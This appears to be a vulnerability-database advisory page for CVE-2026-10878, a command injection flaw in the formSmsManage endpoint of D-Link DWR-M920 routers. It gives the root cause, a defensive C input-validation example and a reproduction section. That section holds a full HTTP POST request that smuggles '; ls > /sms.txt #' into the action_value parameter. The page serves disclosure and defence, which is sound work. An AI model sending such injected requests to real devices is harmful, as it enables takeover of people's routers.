CVE-2026-10878
Description
D-Link DWR-M920 devices are vulnerable to remote command injection via the formSmsManage endpoint due to improper handling of the action_value parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A command injection vulnerability exists in D-Link DWR-M920 devices, specifically affecting versions 1.1.50 and 1.1.70. The vulnerability resides in the formSmsManage route, where the action_value parameter is processed without proper validation. Functions such as sub_41C8E8 and sub_41C9F4 in version 1.1.50, and sub_41EC58 and sub_41ED78 in version 1.1.70, pass this parameter to sprintf without length checks, potentially causing a stack buffer overflow, and then to the system function, leading to command injection [1].
Exploitation
An attacker can exploit this vulnerability remotely by sending a crafted POST request to the /boafrm/formSmsManage endpoint. The request must manipulate the action_value parameter to inject malicious commands. The exploit is publicly available and can be used to trigger command execution [1].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device with the privileges of the running web server process. This could lead to a full compromise of the device, including potential data theft or further network intrusion.
Mitigation
Fixed versions and release dates are not yet disclosed in the available references. No workarounds are provided. The D-Link DWR-M920 is a consumer-grade router, and users should check D-Link's official support channels for any available firmware updates or advisories. Reference [2] provides general product information but no specific mitigation details for this vulnerability.
AI Insight generated on Jun 5, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
Root cause
"The application fails to properly sanitize user-supplied input before passing it to system commands, leading to command injection."
Attack vector
An attacker can remotely send a crafted POST request to the `/boafrm/formSmsManage` endpoint. By manipulating the `action_value` parameter with shell metacharacters and a command, such as `; ls > /sms.txt #`, an attacker can execute arbitrary commands on the system. This is possible due to the lack of input validation and length checks before the parameter is processed by `sprintf` and then passed to the `system` function [ref_id=1].
Affected code
The vulnerability exists in the `formSmsManage` route, specifically within functions like `sub_41C8E8` and `sub_41C9F4` for version 1.1.50, and `sub_41EC58` and `sub_41ED78` for version 1.1.70. These functions retrieve the `action_value` parameter, pass it to `sprintf` without proper checks, and then execute the result using the `system` function [ref_id=1].
What the fix does
The advisory recommends not passing untrusted input directly to system() and instead validating and sanitizing it. This includes allowing only expected characters and rejecting any input containing shell metacharacters. It also suggests avoiding system() entirely if possible, and performing length checks on individual tokens after splitting, not just on the total input length [ref_id=1].
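The validation described above, as an added example that is not code from the advisory or from D-Link firmware. It assumes `action_value` carries a comma-separated list of numeric SMS indices; the function name `parse_sms_indices` and the three limits are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

#define MAX_INPUT_LEN 64  /* assumed bound on the whole parameter */
#define MAX_TOKEN_LEN 4   /* assumed: an SMS index has at most 4 digits */
#define MAX_TOKENS    16  /* assumed bound on indices per request */

/*
 * Parse action_value as a comma-separated list of decimal SMS indices
 * (assumed format). Returns the number of indices stored in out[], or -1
 * if the input is rejected. Only '0'-'9' and ',' are accepted, so shell
 * metacharacters and whitespace never reach a command string.
 */
int parse_sms_indices(const char *value, int out[MAX_TOKENS])
{
    int count = 0, current = 0;
    size_t tok_len = 0;

    if (value == NULL)
        return -1;
    for (size_t i = 0; ; i++) {
        if (i > MAX_INPUT_LEN)                 /* total length check */
            return -1;
        unsigned char c = (unsigned char)value[i];
        if (isdigit(c)) {
            if (++tok_len > MAX_TOKEN_LEN)     /* per-token length check */
                return -1;
            current = current * 10 + (c - '0');
        } else if (c == ',' || c == '\0') {
            if (tok_len == 0 || count == MAX_TOKENS)
                return -1;                     /* empty token or too many */
            out[count++] = current;
            tok_len = 0;
            current = 0;
            if (c == '\0')
                return count;
        } else {
            return -1;                         /* any other byte is rejected */
        }
    }
}

int main(void)
{
    int idx[MAX_TOKENS];
    printf("%d\n", parse_sms_indices("3,17,204", idx));          /* accepted */
    printf("%d\n", parse_sms_indices("; ls > /sms.txt #", idx)); /* rejected */
    return 0;
}
```

A handler built this way acts on the parsed integers, or formats each with `snprintf` and `%d` into a fixed argument vector for an exec-family call, so no request-controlled string is ever handed to `system()`.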
Preconditions
- network: The target device must be accessible over the network.
- input: The attacker must be able to send a POST request to the `/boafrm/formSmsManage` endpoint.
Reproduction
First, visit http://192.168.145.157:8080/sms_inbox.htm. Then, send the following POST request to trigger command injection:
```http
POST /boafrm/formSmsManage HTTP/1.1
Host: 192.168.145.157:8080
Content-Length: 74
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.145.157:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.145.157:8080/sms_inbox.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: webuicookie=WvT4tL6z41Z5G/QG8eZ1GnQK
Connection: close

action_id=readMsg&action_value=; ls > /sms.txt #
```
[ref_id=1]
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References: 6
News mentions: 0
No linked articles in our index yet.